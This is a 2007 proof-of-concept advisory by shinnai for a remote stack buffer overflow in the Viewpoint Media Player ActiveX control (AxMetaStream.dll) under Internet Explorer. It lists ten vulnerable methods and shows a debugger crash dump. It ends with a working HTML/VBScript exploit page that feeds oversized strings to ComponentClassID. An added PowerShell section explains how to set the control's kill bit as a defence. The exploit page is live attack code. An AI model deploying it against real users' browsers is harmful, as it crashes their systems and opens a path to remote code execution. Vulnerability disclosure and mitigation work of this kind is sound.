Viewpoint Media Player for IE 3.2 Remote Stack Overflow PoC
Source: http://shinnai.altervista.org  Author: shinnai  Published: 2007-11-07
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------
<b>Viewpoint Media Player for IE 3.2 (AxMetaStream.dll) Remote Stack Overflow</b>
url: http://www.viewpoint.com

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

<b><font color='red'>This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.</font></b>

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7

<b>Technical details:</b>
File: AxMetaStream.dll
Version: 3.3.2.26 (other versions may also be vulnerable)
MD5 Hash: 3163B59E1C568C8C6EACA1EAB06FA851

<b>Marked as:
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
KillBitSet: False</b>
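The advisory's "KillBitSet: False" line is the practical mitigation lever: IE refuses to instantiate a control whose CLSID carries the kill bit (bit 0x400 of "Compatibility Flags" under the ActiveX Compatibility key). The script below is an added example, not part of shinnai's advisory, that reports the kill-bit state for the CLSID used in the page's object tag and, when run with -Set from an elevated prompt, sets it; the registry paths and the 0x400 flag value come from Microsoft's kill-bit documentation (KB 240797).

```powershell
# Added example (not from the original advisory): check, and optionally set, the ActiveX
# kill bit for the AxMetaStream control's CLSID taken from this page's <object> tag.
# Run from an elevated PowerShell prompt; use -Set to apply the mitigation.
param([switch]$Set)

$clsid   = '{03F998B2-0E00-11D3-A498-00104B6EB52E}'   # CLSID from the page's <object> tag
$killBit = 0x400                                       # COMPAT_ACTIVEX_KILL_BIT (KB 240797)

# 64-bit Windows keeps a second (WOW6432Node) view for 32-bit IE; cover both views.
$paths = @(
  "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid",
  "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
)

foreach ($p in $paths) {
    # Read the current flags; a missing key or value means no flags at all.
    $flags = 0
    if (Test-Path $p) {
        $v = Get-ItemProperty -Path $p -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
        if ($v) { $flags = [int]$v.'Compatibility Flags' }
    }
    $isSet = ($flags -band $killBit) -ne 0
    Write-Output ("{0}`n  kill bit set: {1} (Compatibility Flags = 0x{2:X})" -f $p, $isSet, $flags)

    # Apply the kill bit without clobbering any other compatibility flags already present.
    if ($Set -and -not $isSet) {
        if (-not (Test-Path $p)) { New-Item -Path $p -Force | Out-Null }
        New-ItemProperty -Path $p -Name 'Compatibility Flags' -PropertyType DWord `
            -Value ($flags -bor $killBit) -Force | Out-Null
        Write-Output "  kill bit now set"
    }
}
```

Setting the kill bit blocks every method of the control from script, which is the right scope here since the advisory lists ten vulnerable entry points rather than one.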

<b>Bug description:</b>
The AxMetaStream ActiveX control exposes several methods that accept String parameters.
All of these methods are vulnerable to a stack-based buffer overflow when an overly long
string (greater than 6999 characters) is passed to them.
This is the list of all vulnerable methods:

<b>BroadcastKey()
BroadcastKeyFileURL()
Component()
ComponentClassID()
ComponentFileName()
ExtraProperty()
Properties()
RequiredVersions()
Source()
XMLText()</b>

<b>Product description (from <a href='http://en.wikipedia.org/wiki/Viewpoint_Media_Player'>http://en.wikipedia.org/wiki/Viewpoint_Media_Player</a>)</b>

Viewpoint Media Player is a web browser plug-in that enables users to
view 3D content and other rich media, such as Flash content and video,
on the Internet.
Viewpoint Media Player is included with AOL Instant Greetings, AIM
Themes and some other web applications.
Viewpoint Media Player is distributed with AOL, AIM, versions of Netscape,
certain Adobe products, and some retail computers sold today.
Despite this, these applications will most often work perfectly when Viewpoint
is removed.
A few companies, ranging from online retailers to auto manufacturers,
use Viewpoint Media Player as the graphics platform for interactive 3D tours
of their products.
Viewpoint Media Player powers product tours of the Toyota 4Runner and Sony laptop,
desktop, and server computing products. Despite the arguable usefulness of Viewpoint,
the vast majority of sites will stay away from it, and in practice not having
Viewpoint installed is not going to be an issue.

<b>This is the debugger report at the moment of the overflow, using the first exploit:</b>

1) Disassembly:
    77C172E3   F3:A5            REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] <- CRASH

2) Registers:
    EAX 026A26E4
    ECX 000005B9
    EDX 00000000
    EBX 0269F00C
    ESP 0188B668
    EBP 0188B670
    ESI 026A1000
    EDI 0269F494 ASCII "BBBBBBBBBB..."
    EIP 77C172E3 msvcrt.77C172E3

3) Panel:
    ECX=000005B9 (decimal 1465.)
    DS:[ESI]=[026A1000]=???
    ES:[EDI]=[0269F494]=42424242

4) Dump:
    02681494  42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    026814A4  42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    026814B4  42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    026814C4  42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    026814D4  42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
--------------------------------------------------------------------------------
<object classid='clsid:03F998B2-0E00-11D3-A498-00104B6EB52E' id='test' style='width: 1px; height: 1px'></object>

<input language=VBScript onclick=expl1() type=button value='Exploit #1'>

<input language=VBScript onclick=expl2() type=button value='Exploit #2'>

<script language='VBScript'>
Sub expl1
  For i = 1 to 3
   buff = String(7000, "B")
   test.ComponentClassID = buff
  Next
End Sub

Sub Expl2
  buff = String(600000, "B")
  test.ComponentClassID = buff
End Sub
</script>
</span></span>
</code></pre>
